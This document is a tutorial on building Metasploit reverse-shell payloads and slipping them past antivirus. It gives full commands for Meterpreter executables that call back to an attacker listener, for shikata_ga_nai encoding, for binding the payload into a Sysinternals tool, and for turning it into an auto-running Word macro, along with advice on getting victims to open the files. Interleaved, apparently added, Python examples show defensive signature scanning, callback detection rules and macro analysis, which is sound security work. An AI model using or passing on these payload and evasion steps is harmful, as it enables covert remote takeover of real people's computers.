Using BackTrack 5 and Metasploit.
All antivirus software is built on the idea of malware signatures. This means the antivirus publishers simply keep track of what known malicious software looks like; when your antivirus software updates each day, it picks up all the new signatures. When it detects something that matches one of the recorded signatures, the software alerts the user and quarantines the malicious software.
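To make the signature model above concrete from the scanner's side, here is an added example (not code from the original post): a naive byte-signature scanner together with the kind of entropy heuristic scanners bolt on because signatures alone fail as soon as a single byte of the pattern changes. The signature database, the "Constructed.Stub" pattern and the three sample inputs are constructed for the demo; the only real entry is the EICAR test string, a harmless file every scanner recognises by design.

```python
import math
from collections import Counter

# Constructed toy signature database (pattern name -> byte sequence).
# The EICAR string is the only real entry: it is a harmless test file that
# every scanner recognises by design, so it stands in for a malware signature.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
SIGNATURES = {
    "EICAR-Test-File": EICAR,
    "Constructed.Stub": b"CONSTRUCTED-STUB-v1",  # made-up pattern for the demo
}


def signature_scan(data, signatures=SIGNATURES):
    """Return the names of all signatures whose bytes occur verbatim in data.

    This is the 'known signature' model described above: if any byte of the
    recorded pattern differs in the file, there is no match.
    """
    return [name for name, pattern in signatures.items() if pattern in data]


def shannon_entropy(data):
    """Entropy of the byte distribution in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(data, entropy_threshold=7.0):
    """Signature check plus an entropy heuristic: encoded or packed content
    that no signature covers still tends to show a near-flat byte histogram."""
    hits = signature_scan(data)
    entropy = shannon_entropy(data)
    return {
        "signature_hits": hits,
        "entropy": round(entropy, 2),
        "suspicious": bool(hits) or entropy >= entropy_threshold,
    }


# Constructed samples: a file carrying the EICAR string, an ordinary text
# file, and a 4 KiB blob in which every byte value occurs equally often
# (the flat distribution an encoded payload body tends towards).
SAMPLE_EICAR_FILE = b"MZ-header-goes-here " + EICAR
SAMPLE_TEXT = b"Quarterly report: revenue is up and costs are flat.\n" * 20
SAMPLE_ENCODED_BLOB = bytes(range(256)) * 16

if __name__ == "__main__":
    for label, blob in [("eicar", SAMPLE_EICAR_FILE),
                        ("text", SAMPLE_TEXT),
                        ("blob", SAMPLE_ENCODED_BLOB)]:
        print(label, classify(blob))
```

The text sample is neither matched nor high-entropy, the EICAR sample is caught purely by signature, and the blob is caught only by the entropy heuristic; the threshold of 7.0 bits is a demo value, and real engines combine many more such heuristics with behavioural monitoring.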
So what are we going to do? We are simply going to change our msfpayload signature. How? Keep reading.
So what do we need?
BackTrack 5
The ability to sit for a long time
A LOT of brain and some patience.
Method 1: Metasploit Antivirus Bypass
A skilled intruder who delivers a payload to your network in the form of an email message will want to make sure the payload can evade detection by antivirus software. 90% of antivirus programs depend on a malware-signature database to tell harmful files from normal ones. We will now create a file that will (try to) slip through antivirus scanners.
The Metasploit penetration testing framework provides a collection of tools you can use to test a network by attacking it the way an intruder would. Metasploit's msfpayload tool helps you create a standalone binary to serve as a malicious payload, and msfencode encodes that binary to confuse antivirus scanners. msfpayload can generate shellcode, executables, etc. So here we go:
But before we encode the payload to bypass antivirus detection, we will create a stand-alone binary with msfpayload. msfpayload creates a binary that launches a simple reverse shell, allowing a remote user to connect to the victim's machine. We can narrow down the list of available payloads with the command "msfpayload -l | grep windows", which lists only the payloads specific to Windows operating systems.
We will start by trying the Windows Meterpreter reverse_tcp payload. The windows/meterpreter/reverse_tcp payload connects back to the attacker, as in earlier tutorials, injecting the Meterpreter server DLL via the reflective DLL injection payload. The O command-line argument shows all the available configurable options:
I create the payload with the following command (LHOST must be the address the handler will later listen on, and LPORT its port):
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe
If the victim PC is not running antivirus, all you need to do now is deliver the file, which is easy: send it bundled into another application or attached to a mail, or plug in a USB stick and click on it. If it does have antivirus, read on.
To take advantage of the victim running the executable, we need a listener running on the attack machine. To listen for the victim running the executable, use the following command:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 E
This command opens a listener on the local machine on port 4444 and, once the victim runs the executable, opens a Meterpreter shell on the victim's Windows box:
Now that the payload is working, the next step is to find a way to avoid antivirus detection. Since you can't run multiple antivirus products on your own PC to check the file, we are going to use a website called VirusTotal, which scans the file with a collection of antivirus engines. Bad luck: our file got detected by most of them.
In hopes of a better result, we will bring in msfencode to try to get past the antivirus vendors. To do this (hard, very hard), you pipe the raw output of msfpayload into msfencode using the "shikata ga nai" (Japanese) encoder. The encoder outputs a Windows binary:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/evil.exe
The results still show several hits with antivirus scanners, so we will take another approach. Some antivirus products work on signature-based technology, and the payload shell_reverse_tcp shows up right away, so we can try the alternative windows/shell/reverse_tcp payload instead of windows/shell_reverse_tcp:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -t exe -x /root/Desktop/pslist.exe -o /root/Desktop/pslist2.exe -e x86/shikata_ga_nai -c 10
We can also take additional steps to hide the payload. This time, take an executable from the Sysinternals site called pslist.exe and encode the payload into it 10 times with shikata_ga_nai. The payload is combined with the Sysinternals tool pslist.exe and written out as pslist2.exe. Try it again on VirusTotal: only detected by a few antivirus engines, yay!
Several common scanners did not identify the payload. Use the msfcli command to set up a listener as before. If the payload slips through, it will open a shell on your BackTrack box with ADMIN privileges on the Windows system (now that's what I'm talking about).
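The callback described in Method 1 (a dropped executable connecting back to the handler on port 4444) is what endpoint telemetry should be watching for, regardless of whether the file's bytes matched a signature. The following is an added example, not code from the original post: a small Python rule set run over constructed Sysmon-style events. The event layout, paths, PIDs and addresses are assumptions made up for the demo (203.0.113.10 is from the TEST-NET-3 documentation range), and the handler port list is seeded only with the 4444 used on this page.

```python
# Constructed endpoint telemetry, loosely modelled on Sysmon event fields
# (EventID 1 = process creation, EventID 3 = network connection).
# None of these are real log lines; paths, PIDs and addresses are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120,
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 5222,
     "Image": r"C:\Users\alice\Desktop\pslist2.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessId": 5222,
     "Image": r"C:\Users\alice\Desktop\pslist2.exe",
     "Initiated": True, "DestinationIp": "192.168.1.134", "DestinationPort": 4444},
    {"EventID": 1, "ProcessId": 5310,
     "Image": r"C:\Users\alice\AppData\Local\Temp\tmpA1B2.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"},
    {"EventID": 3, "ProcessId": 5310,
     "Image": r"C:\Users\alice\AppData\Local\Temp\tmpA1B2.exe",
     "Initiated": True, "DestinationIp": "192.168.1.134", "DestinationPort": 4444},
    {"EventID": 3, "ProcessId": 6001,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Initiated": True, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

# The handler port used throughout this page. In practice the attacker picks
# LPORT freely, so feed this set from your own intel rather than one value.
HANDLER_PORTS = {4444}
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
USER_WRITABLE_MARKERS = ("\\desktop\\", "\\downloads\\", "\\temp\\", "\\appdata\\")


def detect(events):
    """Apply three rules to an event stream; return (rule, pid, image) alerts."""
    alerts = []
    for e in events:
        image = e["Image"].lower()
        pid = e["ProcessId"]
        if e["EventID"] == 1:
            # Rule 1: an Office application spawning an executable. A macro
            # that drops and starts a binary looks exactly like this.
            if e.get("ParentImage", "").lower().endswith(OFFICE_APPS):
                alerts.append(("office_spawned_process", pid, image))
        elif e["EventID"] == 3 and e.get("Initiated"):
            # Rule 2: outbound connection to a known handler port.
            if e["DestinationPort"] in HANDLER_PORTS:
                alerts.append(("known_handler_port", pid, image))
            # Rule 3: a binary run from a user-writable directory opening its
            # own outbound connection (noisy alone; pair with an allow-list).
            if any(marker in image for marker in USER_WRITABLE_MARKERS):
                alerts.append(("user_writable_binary_egress", pid, image))
    return alerts


def correlate(alerts, min_rules=2):
    """Group alerts per PID; a process that trips several rules is triaged first."""
    by_pid = {}
    for rule, pid, _image in alerts:
        by_pid.setdefault(pid, set()).add(rule)
    return {pid: sorted(rules) for pid, rules in by_pid.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print(correlate(found))
```

Both the encoded pslist2.exe from Method 1 and the binary dropped by a Word macro end up in the same place: a process started from a user-writable path that immediately calls out to the handler. That behaviour is far harder to re-encode away than the file's byte pattern, which is why the correlation step ranks those two PIDs and leaves the browser alone.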
VBS Script Infection: The Ultimate Trick.
As you can see from the previous attempts, although it is possible to slip past a specific scanner with a specific payload, in general antivirus products are very effective at their jobs (unlike the government peeps). Another way to deliver a dangerous payload is a Word document. Word documents are very commonly passed around by email and opened by many people, so a Word doc is a great attack vector. Metasploit has built-in methods for infecting Word documents with Metasploit payloads.
Start by creating a VBScript payload:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 ENCODING=shikata_ga_nai X > evi1payload.exe
Now convert this executable to a VBScript using a script found in the tools directory of Metasploit. Just copy evilpayload.exe (the name of my file) to the tools folder:
cp /opt/framework3/msf3/evilpayload.exe /opt/framework3/msf3/tools
Inside the Tools folder, you will find a script called "exe2vba.rb". Issue the following command to convert the .exe to a .vbs:
ruby exe2vba.rb evilpayload.exe evil_payload.vbs
Now copy evil_payload.vbs to a Windows machine that has Microsoft Word installed, open evil_payload.vbs with Notepad, and open a blank Microsoft Word document. In Microsoft Word 2003, go to Tools -> Macros -> Visual Basic Editor, or go to "View Macros" if you are using Microsoft Word 2010 or higher. Then copy the first portion of evil_payload.vbs, from "Sub Auto_Open()" to "End Sub", and paste it into the Visual Basic Editor in Microsoft Word 2003, 2007 or higher. See below for suggestions.
Then copy the portion from "PAYLOAD DATA" to the end into the body of the Word document.
Now we will verify that this Word document can get past antivirus: upload it to VirusTotal and see if it catches anything.
None for me (suck it, AVG and BitDefender).
The Word doc slips past all the antivirus vendors. Now be crafty and get the victim to click on this document. Once you have delivered the Word document to your intended victim, make sure you have the Metasploit listener up and running on the attack machine.
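The reason the macro route above goes unnoticed by a byte-signature scanner is that the document carries no recognisable executable bytes, only VBA source and an encoded data blob. What does not change is the structure of the macro: an auto-executing procedure name and the calls needed to write and start a program. The following is an added example, not code from the original post or from Metasploit: a Python checker that flags those traits in extracted VBA source. The pattern list, the trigger-name list and the two sample macros are constructed for the demo.

```python
import re

# Procedure names Word and Excel run on their own when a document is opened
# or closed; the technique described on this page relies on Auto_Open.
AUTO_EXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Auto_?Open|Auto_?Close|Auto_?Exec|Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE,
)

# Capabilities a macro needs to drop and start a program. Each is a plain
# regular expression over the VBA source; a real tool such as olevba covers a
# far larger list, this is the minimum needed to show the idea.
SUSPICIOUS_PATTERNS = {
    "process_start": re.compile(r"\b(?:Shell|CreateObject|WScript\.Shell)\b", re.IGNORECASE),
    "binary_file_write": re.compile(r"\bOpen\b[^\n]*\bFor\s+Binary\b|\bPut\s*#", re.IGNORECASE),
    "environment_lookup": re.compile(r"\bEnviron\s*\(", re.IGNORECASE),
    "string_assembly": re.compile(r"\bChr[WB]?\s*\(", re.IGNORECASE),
}


def analyze_vba(source):
    """Return auto-exec triggers, per-pattern hit counts and a coarse verdict."""
    triggers = [m.group(1) for m in AUTO_EXEC_RE.finditer(source)]
    findings = {}
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        count = len(pattern.findall(source))
        if count:
            findings[name] = count
    if triggers and findings:
        verdict = "auto-exec+suspicious"
    elif triggers:
        verdict = "auto-exec"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"auto_exec": triggers, "findings": findings, "verdict": verdict}


# Constructed sample macros. The first has the shape the page describes
# (an Auto_Open trigger that starts a process); the second is ordinary
# document automation with no auto-run trigger.
SAMPLE_AUTO_RUN = """\
Sub Auto_Open()
    ' Constructed sample: auto-run trigger plus a process start.
    Shell "calc.exe", vbNormalFocus
End Sub
"""

SAMPLE_BENIGN = """\
Sub FormatReport()
    ' Constructed sample: ordinary document automation.
    Selection.Font.Bold = True
    ActiveDocument.Save
End Sub
"""

if __name__ == "__main__":
    print(analyze_vba(SAMPLE_AUTO_RUN))
    print(analyze_vba(SAMPLE_BENIGN))
```

To run this against a real document, extract the VBA text first (olevba from the oletools package does that for .doc and .docm files) and pass the result to analyze_vba; the trigger-plus-capability combination is the signal, since plenty of legitimate macros use Shell and plenty use Auto_Open, but few need both.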